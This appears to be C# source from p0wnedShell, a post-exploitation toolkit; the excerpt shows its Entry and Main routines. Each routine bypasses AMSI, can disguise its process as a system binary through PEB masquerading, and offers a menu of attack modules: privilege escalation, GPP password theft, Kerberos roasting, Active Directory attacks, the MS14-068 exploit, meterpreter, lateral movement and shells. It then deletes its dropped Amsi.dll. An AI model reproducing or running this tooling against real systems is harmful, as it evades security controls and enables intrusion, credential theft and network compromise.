public static void Entry()
{
string Arch = System.Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE");
string LatestOSVersion = "6.3";
decimal latestOSVersionDec = decimal.Parse(LatestOSVersion, CultureInfo.InvariantCulture);
if (Pshell.EnvironmentHelper.RtlGetVersion() > latestOSVersionDec)
{
string MasqPath = p0wnedShellOpsec.masqBinary.Remove(p0wnedShellOpsec.masqBinary.LastIndexOf(@"\")).ToLower();
string SystemPath = Environment.SystemDirectory.ToLower();
AmsiBypass.Amsi(Arch);
if (p0wnedShellOpsec.AutoMasq && MasqPath == SystemPath)
{
// Starting Runspace before we Masquerade our Process
Pshell.P0wnedListener.Execute("Write-Host '[+] AMSI Bypassed'");
}
}
if (p0wnedShellOpsec.AutoMasq || ConsoleEx.IsInputRedirected || ConsoleEx.IsOutputRedirected)
{
Console.WriteLine("[+] Auto Masquerade our Process to: {0}", p0wnedShellOpsec.masqBinary);
if (!PEBMasq.MasqueradePEB(p0wnedShellOpsec.masqBinary))
{
Console.WriteLine("[!] Auto Masquerade Failed :(");
}
}
if (!p0wnedShellOpsec.AutoMasq)
{
Console.Title = "p0wnedShell - PowerShell Runspace Post Exploitation Toolkit";
}
if (!ConsoleEx.IsInputRedirected || !ConsoleEx.IsOutputRedirected || !ConsoleEx.IsErrorRedirected)
{
Console.SetWindowSize(Math.Min(120, Console.LargestWindowWidth), Math.Min(55, Console.LargestWindowHeight));
}
int userInput = 0;
do
{
userInput = DisplayMenu();
switch (userInput)
{
case 1:
Pshell.PowerView();
break;
case 2:
SitAwareness.Menu();
break;
case 3:
Pshell.PortScan();
break;
case 4:
Execution.Menu();
break;
case 5:
Pshell.PowerUp();
break;
case 6:
GetSystem.Menu();
break;
case 7:
Inveigh.Menu();
break;
case 8:
Pshell.GetGPPPassword();
break;
case 9:
Roast.Menu();
break;
case 10:
ADAttacks.Menu();
break;
case 11:
Exploits.Menu();
break;
case 12:
if (Arch == "x86")
{
Pshell.MS14_068();
}
else
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("\n[+] Sorry this option only works for p0wnedShellx86\n");
Console.ResetColor();
Console.WriteLine("Press Enter to Continue...");
Console.ReadLine();
}
break;
case 13:
p0wnedMeter.Menu();
break;
case 14:
LatMovement.Menu();
break;
case 15:
PowerCat.Menu();
break;
case 16:
Pshell.InvokeShell();
break;
default:
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("\nSee you later Alligator ;)");
Console.ResetColor();
break;
}
} while (userInput != 17);
string TempFolder = Path.GetTempPath();
if (File.Exists(TempFolder + "\\Amsi.dll"))
{
File.Delete(TempFolder + "\\Amsi.dll");
}
}
public static void Main()
{
Console.Title = "p0wnedShell - PowerShell Runspace Post Exploitation Toolkit";
Console.SetWindowSize(Math.Min(120, Console.LargestWindowWidth), Math.Min(55, Console.LargestWindowHeight));
string Arch = System.Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE");
string LatestOSVersion = "6.3";
decimal latestOSVersionDec = decimal.Parse(LatestOSVersion, CultureInfo.InvariantCulture);
if (Pshell.EnvironmentHelper.RtlGetVersion() > latestOSVersionDec)
{
AmsiBypass.Amsi(Arch);
}
int userInput = 0;
do
{
userInput = DisplayMenu();
switch (userInput)
{
case 1:
Pshell.PowerView();
break;
case 2:
SitAwareness.Menu();
break;
case 3:
Pshell.PortScan();
break;
case 4:
Execution.Menu();
break;
case 5:
Pshell.PowerUp();
break;
case 6:
GetSystem.Menu();
break;
case 7:
Inveigh.Menu();
break;
case 8:
Pshell.GetGPPPassword();
break;
case 9:
Roast.Menu();
break;
case 10:
ADAttacks.Menu();
break;
case 11:
Exploits.Menu();
break;
case 12:
if (Arch == "x86")
{
Pshell.MS14_068();
}
else
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("\n[+] Sorry this option only works for p0wnedShellx86\n");
Console.ResetColor();
Console.WriteLine("Press Enter to Continue...");
Console.ReadLine();
}
break;
case 13:
p0wnedMeter.Menu();
break;
case 14:
LatMovement.Menu();
break;
case 15:
PowerCat.Menu();
break;
case 16:
Pshell.InvokeShell();
break;
default:
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("\nSee you later Alligator ;)");
Console.ResetColor();
break;
}
} while (userInput != 17);
if (File.Exists(Program.P0wnedPath() + "\\Amsi.dll"))
{
File.Delete(Program.P0wnedPath() + "\\Amsi.dll");
}
}